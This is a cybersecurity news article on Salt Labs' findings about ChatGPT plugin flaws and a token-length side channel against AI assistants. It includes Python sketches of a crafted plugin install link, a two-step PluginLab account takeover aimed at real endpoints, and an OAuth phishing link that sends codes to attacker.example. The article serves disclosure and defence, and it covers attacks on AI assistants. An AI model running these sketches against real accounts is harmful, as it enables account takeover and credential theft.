
Account Takeovers may result from Third-Party ChatGPT Plugins

Cybersecurity researchers have discovered that third-party plugins for OpenAI ChatGPT could create a new attack vector for hackers seeking unauthorized access to sensitive information.

As per recent research by Salt Labs, vulnerabilities within ChatGPT and its ecosystem could enable attackers to install malicious plugins without user consent and compromise accounts on third-party platforms like GitHub.

ChatGPT plugins are tools designed to enhance the functionality of the large language model (LLM) by accessing real-time information, performing computations, or integrating with third-party services.

OpenAI has also introduced GPTs, customized versions of ChatGPT for specific purposes, reducing reliance on third-party services. Starting March 19, 2024, ChatGPT users will no longer be able to create new conversations with existing plugins or install new ones.

One identified vulnerability involves exploiting the OAuth workflow to deceive users into installing unauthorized plugins, taking advantage of ChatGPT's lack of validation during the installation process. This could allow threat actors to intercept and exfiltrate sensitive data, including proprietary information.
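A minimal sketch of how such a crafted installation link might be assembled is shown below. The callback path, parameter name, and helper function are assumptions for illustration only and are not taken verbatim from Salt Labs' write-up.

```python
# Hypothetical sketch of the crafted-link step described above. The callback
# path and "code" parameter are assumptions based on how the flow is
# described, not values taken from Salt Labs' report.
from urllib.parse import urlencode

# Authorization code issued for the attacker's own account on the plugin,
# captured by the attacker during a legitimate installation of that plugin.
ATTACKER_AUTH_CODE = "attacker-authorization-code"

def build_malicious_install_link(plugin_slug: str) -> str:
    """Build a link that completes a plugin installation with the attacker's
    OAuth code; because ChatGPT reportedly did not validate that the code
    belonged to the user finishing the flow, a victim who clicks it ends up
    with the plugin bound to attacker-controlled credentials."""
    query = urlencode({"code": ATTACKER_AUTH_CODE})
    return f"https://chat.openai.com/aip/{plugin_slug}/oauth/callback?{query}"

print(build_malicious_install_link("plugin-example"))
```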

Additionally, Salt Labs found issues with PluginLab, a framework for building and hosting ChatGPT plugins, that could be exploited by hackers to perform zero-click account takeovers, compromising an organization's accounts on third-party platforms like GitHub and exposing its source code repositories.

“[The endpoint] ‘auth.pluginlab[.]ai/oauth/authorized’ doesn’t authenticate the request, allowing the attacker to insert a different memberId (i.e., the victim’s) to access the victim’s GitHub,” explained security researcher Aviad Carmel.

The victim’s memberId can be obtained by querying the endpoint “auth.pluginlab[.]ai/members/requestMagicEmailCode.” There is no evidence that user data was actually compromised through this flaw.
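The reported flow can be illustrated with a short, hypothetical sketch. Only the two endpoint paths come from the research above; the request and response field names (email, memberId, code) and the use of the requests library are assumptions for illustration.

```python
# Illustrative sketch of the reported zero-click PluginLab flow. Field names
# and response shapes are assumptions; only the endpoint paths appear in the
# research described above.
import requests

BASE = "https://auth.pluginlab.ai"

def takeover_sketch(victim_email: str) -> str:
    # Step 1: an unauthenticated endpoint leaks the victim's memberId.
    r = requests.post(f"{BASE}/members/requestMagicEmailCode",
                      json={"email": victim_email}, timeout=10)
    member_id = r.json().get("memberId")  # assumed field name

    # Step 2: /oauth/authorized does not authenticate the caller, so the
    # attacker substitutes the victim's memberId and receives a code that
    # represents the victim toward the plugin (and, through it, GitHub).
    r = requests.get(f"{BASE}/oauth/authorized",
                     params={"memberId": member_id}, timeout=10)
    return r.json().get("code")  # assumed field name
```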

Furthermore, several plugins, including Kesem AI, were found to contain an OAuth redirection manipulation bug that could enable attackers to steal credentials associated with the plugin by sending specially crafted links to victims.
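As a hedged sketch of what such OAuth redirection manipulation generally looks like, the snippet below builds an otherwise-legitimate authorization link whose redirect_uri points at an attacker-controlled server. The endpoint and parameter names are generic OAuth placeholders, not values taken from the affected plugins.

```python
# Generic OAuth redirect-manipulation sketch; endpoint and parameters are
# illustrative placeholders, not taken from Kesem AI or the other plugins.
from urllib.parse import urlencode

def build_phishing_auth_link(authorize_endpoint: str, client_id: str) -> str:
    """If a plugin does not pin or validate redirect_uri, an attacker can send
    the victim an authorization link that delivers the victim's authorization
    code to an attacker-controlled server instead of the plugin."""
    params = urlencode({
        "client_id": client_id,
        "response_type": "code",
        "redirect_uri": "https://attacker.example/collect",  # attacker-controlled
    })
    return f"{authorize_endpoint}?{params}"

print(build_phishing_auth_link("https://plugin.example/oauth/authorize", "demo-client"))
```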

These revelations come on the heels of Imperva’s disclosure of two cross-site scripting (XSS) vulnerabilities in ChatGPT that, when combined, could lead to unauthorized account access.

In late 2023, researcher Johann Rehberger demonstrated how malicious actors could create custom GPTs to extract user credentials and transmit the stolen data externally.

New Remote Keylogging Attack on AI Assistants

Recent research has also highlighted an LLM side-channel attack that leverages token length as a covert channel to recover the content of encrypted responses from AI assistants over the internet.

“LLMs produce responses as a series of tokens, with each token transmitted as it’s generated. Despite encryption, the sequential transmission exposes a new side-channel: the token-length side-channel. This can allow attackers to infer sensitive information shared during private AI assistant conversations,” explained academics from Ben-Gurion University and Offensive AI Research Lab.

This token inference attack aims to decipher encrypted responses by training a language model to translate token-length sequences back into plaintext, enabling attackers to glean confidential information shared in real-time chats with AI assistants.
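A rough sketch of the first step of such an attack is shown below, under the assumption that each token travels in its own encrypted record with a fixed framing overhead; the overhead constant and function names are illustrative, not taken from the paper.

```python
# Illustrative sketch of the token-length side channel: if each generated
# token is sent in its own encrypted record with a fixed per-record overhead
# (an assumption for this example), ciphertext size minus overhead reveals
# the token's length in bytes.
from typing import List

RECORD_OVERHEAD = 29  # assumed constant framing/AEAD overhead per record

def token_lengths_from_capture(record_sizes: List[int]) -> List[int]:
    """Turn a passively observed sequence of encrypted record sizes into the
    token-length sequence that a trained model would then translate into
    likely plaintext."""
    return [size - RECORD_OVERHEAD for size in record_sizes]

# Example: observed records of 30, 34 and 32 bytes -> token lengths 1, 5, 3.
print(token_lengths_from_capture([30, 34, 32]))
```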

To mitigate this side-channel attack, it’s advised that AI assistant developers implement random padding, transmit tokens in larger groups, and send complete responses at once to obscure the length of tokens, balancing security with usability and performance.
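As a rough sketch of what random padding and token batching could look like on the assistant's side, assuming the service controls how responses are framed before encryption (constants and names below are illustrative):

```python
# Illustrative padding/batching mitigations; block size, group size and
# function names are assumptions, not a vendor's actual implementation.
import secrets
from typing import Iterable, List

def pad_to_block(payload: bytes, block: int = 64) -> bytes:
    """Pad a chunk up to the next multiple of `block` bytes plus a small
    random amount, so its ciphertext size no longer reveals token lengths."""
    target = ((len(payload) // block) + 1) * block + secrets.randbelow(block)
    return payload + b"\x00" * (target - len(payload))

def batch_tokens(tokens: Iterable[str], group_size: int = 8) -> List[bytes]:
    """Group several tokens into one padded record instead of streaming one
    record per token, hiding individual token boundaries from an observer."""
    out: List[bytes] = []
    buf: List[str] = []
    for tok in tokens:
        buf.append(tok)
        if len(buf) == group_size:
            out.append(pad_to_block("".join(buf).encode()))
            buf = []
    if buf:
        out.append(pad_to_block("".join(buf).encode()))
    return out

# Example: four short tokens become a single padded record of obscured size.
print([len(r) for r in batch_tokens(["The", " quick", " brown", " fox"], group_size=4)])
```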
